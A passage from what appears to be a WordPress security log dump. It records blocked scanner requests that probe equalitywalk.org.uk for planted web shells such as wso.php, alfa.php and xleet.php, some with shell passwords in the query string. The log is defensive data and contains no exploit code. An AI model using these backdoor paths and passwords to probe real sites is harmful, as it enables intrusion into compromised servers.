\/wp-includes\\/\\/xmrlpc.php\"}','8xf7OuRyK43h6qWmbLNeFvEZ',0,1674345672.3368,143,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/xx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/\\/xx.php\"}','xF3CgNXvK5tqenVQ9TBGo426',0,1674345672.6959,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','PUdpgR1DtXJAzLFkmbK4jH0S',0,1674345673.0475,115,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/assets/pi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/assets\\/pi.php\"}','EJnrVel63GtWUT8L4Ov7ahIP',0,1674345673.4534,116,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/block-supports/generated-classname-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/block-supports\\/generated-classname-cron.php\"}','uFr7XUEpmASLWziQlK8tNZYR',0,1674345673.7243,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/css/ty.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/css\\/ty.php\"}','rwz6vI79y12HJZqjPdWV5eUp',0,1674345674.0654,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/customize\\/class-wp-customize-nav-menu.php?new\"}','JGOZPjqn3oW4d6NRB8CeUmxK',0,1674345674.4006,105,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/js/a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/js\\/a.php\"}','rUcWdabF6Lpq3lI5B7znS2yi',0,1674345674.6624,99,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/alfa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/alfa.php\"}','IRK04busAfgiLDCta12QvXkw',0,1674345675.1004,109,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-includes/pomo/css_.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-includes\\/pomo\\/css_.php\"}','oICkyJdle0hb8MTN6vOUZPmq',0,1674345675.3738,97,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-info.php\"}','cgZ8z6Gufy4Ev1isNrojOYlD',0,1674345675.6367,94,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-x.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-x.php\"}','gb8MHlzeQNjxPBsaSW91iZCo',0,1674345675.8841,105,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp.php\"}','wE9Mqx1IyXQilbA6Uanr04O8',0,1674345676.1556,103,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp_logx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp_logx.php\"}','MR4rAOdIEJq8BsiTjYoCfkGt',0,1674345676.4158,147,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php?pass=stusa','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp_wrong_datlib.php?pass=stusa\"}','3kSsyOftIe9GBoYFMZzETHaN',0,1674345676.7287,100,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wpx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wpx.php\"}','CoKfvZqDVwpkOL0ymMbXciGh',0,1674345676.9821,108,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wso.php\"}','GLjdK03umID9Hk6ys4rpCWq8',0,1674345677.2632,96,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wxo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wxo.php\"}','nrPCA2JQdF53BON6URTDG9f0',0,1674345677.5954,108,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/x.php\"}','eLMxhsoilzDHnrG95TvAU8XR',0,1674345677.9091,128,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xl.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xl.php\"}','Vgeq5HbQ8mAjIDCtv20LpG9W',0,1674345678.2140,117,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xleet.php\"}','rKMvAlBsypLZaogPU0chb7Xu',0,1674345678.5030,238,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xlt.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xlt.php\"}','YLJtas5bVTeMFgdvQSuOh3G8',0,1674345679.0288,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xml.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xml.php\"}','8ZYyiBVkIhOfgJlUDaR3dtTF',0,1674345679.3450,96,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xmlrqc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xmlrqc.php\"}','UbmYrjog42eBTsPCJtyhVFMW',0,1674345679.5990,110,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xwxx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xwxx.php\"}','XHSt5ZLKk2du3TjgriBaoAx1',0,1674345679.8662,111,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/XxX.php\"}','HvqbJLShwarj0ue1xckQCPBy',0,1674345680.2081,102,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/xx.php\"}','WMp8mK9asOXBPTVLldDQhgRr',0,1674345680.4625,110,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-2018.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-2018.php\"}','NSQpchz2CTrx1gMBOviyfnGk',0,1674345680.7251,120,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-2019.php\"}','ahgupwmAIHPc4vWo2ZsiBSj1',0,1674345680.9969,227,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-2020.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-2020.php\"}','3fFHMudwn4CKSi80WTj52UQx',0,1674345681.4585,127,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-2021.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-2021.php\"}','8yjZ73eqwhlFSNzDEHLOp9uI',0,1674345681.7406,91,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-2022.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-2022.php\"}','G1eR8VKsBt5yNA4u3fjlmEFH',0,1674345681.9861,126,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/wp-22.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/\\/wp-22.php\"}','0VgeqzHwGWSIMD1tQmTn7Xpo',0,1674345682.2764,123,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.equalitywalk.org.uk/hax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/hax.php\"}','odJakjMeC65c0A14xYnFpPEK',0,1674345682.5793,93,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','https://equalitywalk.org.uk/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','4Da9ReIm1qpJuNYnwEKl8oM2',0,1674349571.8942,1068,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','4hasbmptiEYPIJWSXLyZ8gKG',0,1674376014.6427,281,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','FfJulkiIzsKYhU2VvORw3rq0',0,1674376015.4084,102,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','K2ve9rocCzuWSZRmtg4d1JOX',0,1674376015.9784,140,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','epJhLzivODHGPdVRcsU9SB54',0,1674376016.5803,151,'','GET',403,0,700,0,1,'',0),('20.210.237.151',349367703,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','9HLAPVhKTZbqNFg0EJlQ5ewn',0,1674376017.2141,481,'','GET',403,0,700,0,1,'',0),('170.133.121.40',2860874024,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NgCVFZbcUIt2rKT9BpfvnDlW',0,1674384813.9276,174,'','GET',403,0,700,0,1,'',0),('170.133.121.40',2860874024,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uUhfbXkINDtWogAO8sFaJGdj',0,1674384826.8884,125,'','GET',403,0,700,0,1,'',0),('170.133.121.40',2860874024,'','https://www.equalitywalk.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fRtJMdCDqbPcU3xQ4GYZAXgm',0,1674384840.1505,107,'','GET',403,0,700,0,1,'',0),('170.133.121.40',2860874024,'','https://www.equalitywalk.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','eXPK2uNRLSbAQHCkVltqc10B',0,1674384859.3863,103,'','GET',403,0,700,0,1,'',0),('170.133.121.40',2860874024,'','https://www.equalitywalk.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','baDUKNxGYXorQsZStmdOMf9T',0,1674384870.6704,127,'','GET',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://equalitywalk.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','GzcENfeYM605QKXt2g3Vxoj8',0,1674386449.4615,112,'','POST',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://equalitywalk.org.uk/hgiufwhf.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','kQRzpe8MTtrOa0P26v41ubJG',0,1674386449.6352,104,'','GET',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','IHsPcrwjvhbMFn7C6mLBqfAW',0,1674386450.2230,100,'','GET',403,0,700,0,1,'',0),('176.111.173.153',2960108953,'','https://www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','13FiTS90COZuwjD8qKIPxdV2',0,1674386450.4213,98,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://www.equalitywalk.org.uk/wp-comments.php?pw=AsAjfkel!@&path=wp-test','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/www.equalitywalk.org.uk\\/wp-comments.php?pw=AsAjfkel!@&path=wp-test\"}','Ifk2ij6EpzJOYxrqZ4ceTRw9',0,1674396067.3088,211,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/1index.php?http://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PtCRnz783xupWH9lZdjQMKga',0,1674411930.9862,815,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/11index.php?http://equalitywalk.org.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vq1FLK8BmHMyuQcza03oUlSt',0,1674411946.7752,404,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/2index.php?http://equalitywalk.org.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','81vg3UWkoyrs6AbJt0Pcjn7N',0,1674411957.0196,471,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/3index.php?http://equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rVxXDASOpHy1bdZ4B0hk2n6t',0,1674411966.4005,239,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp_wrong_datlib.php?http://equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Jypla8TcPSOHKjLrsR1twbeq',0,1674411973.6452,596,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-adminincludesclass-wp-media-list-data.php?http://equalitywalk.org.uk/wp-adminincludesclass-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o8wcQ7XBGOzKupD5frtJHE6l',0,1674411985.1153,310,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/autoload_classmap.php?http://equalitywalk.org.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wvIN9gRWAUTaDb6pGok8S14m',0,1674411997.9904,655,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wso.php?http://equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7E5GxeicCJ4MtyKwf92LVWRb',0,1674412009.5787,822,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/doc.php?http://equalitywalk.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','93RTluxsageSbJH6dmUrNXVw',0,1674412015.8722,692,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/stindex.php?http://equalitywalk.org.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mrYpXBPSItiEhb9c0ldvNMgw',0,1674412023.8606,799,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alwso.php?http://equalitywalk.org.uk/alwso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','neN8R1gMFpDsIYv9K73OwACE',0,1674412033.8113,502,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/ups.php?http://equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1KOi9quzhVbLygtCrkZe25Np',0,1674412037.9321,753,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/media-admin.php?http://equalitywalk.org.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V7pgNzoFZf3jMDwPknOcyxi5',0,1674412044.4096,463,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/sym.php?http://equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0gTdiylzDnFSPNvHBrZJoOVb',0,1674412053.6365,295,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/sym403.php?http://equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YLJcqFjSRW1A9xpIasQzi2hl',0,1674412061.7131,431,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/fw.php?http://equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ou2BeEUvAWgPtcGd3jzTYqD5',0,1674412070.9914,188,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/symlink.php?http://equalitywalk.org.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xl6ZrjFRikTPVcAfObzWKD8t',0,1674412078.0500,657,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/shell.php?http://equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gtizcpMun6Pfwhs9l0aBvWmD',0,1674412088.0874,688,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/1.php?http://equalitywalk.org.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wm29xpbQ1SUWjeq8ogIH34fP',0,1674412095.6116,689,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/data.php?http://equalitywalk.org.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','360OJQaoqvCpSlWndmytPuTk',0,1674412099.5229,583,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/wp-blog.php?http://equalitywalk.org.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X5oY29lLJbnAdVzUTcfPj1Oq',0,1674412104.1939,410,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/b.php?http://equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pZWi2AE0wO9UBlN7cx4vMeJt',0,1674412111.1700,513,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/c.php?http://equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0OiBSoPtDj6Me17NsGfCkVAa',0,1674412119.0124,442,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/shx.php?http://equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DsJHrYvM654CtFEoSpWucA02',0,1674412124.7783,879,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/alfa.php?http://equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lKf3OMovL8CIFhZdkQpY2jmr',0,1674412130.1913,438,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/a.php?http://equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0rKDGSVB6ApCW3LRh5Xo1Ntu',0,1674412140.6120,327,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/old-index.php?http://equalitywalk.org.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','twbvHqYrn9JhAoigeWMuLxGj',0,1674412143.4249,633,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://equalitywalk.org.uk/FoxWSO.php?http://equalitywalk.org.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 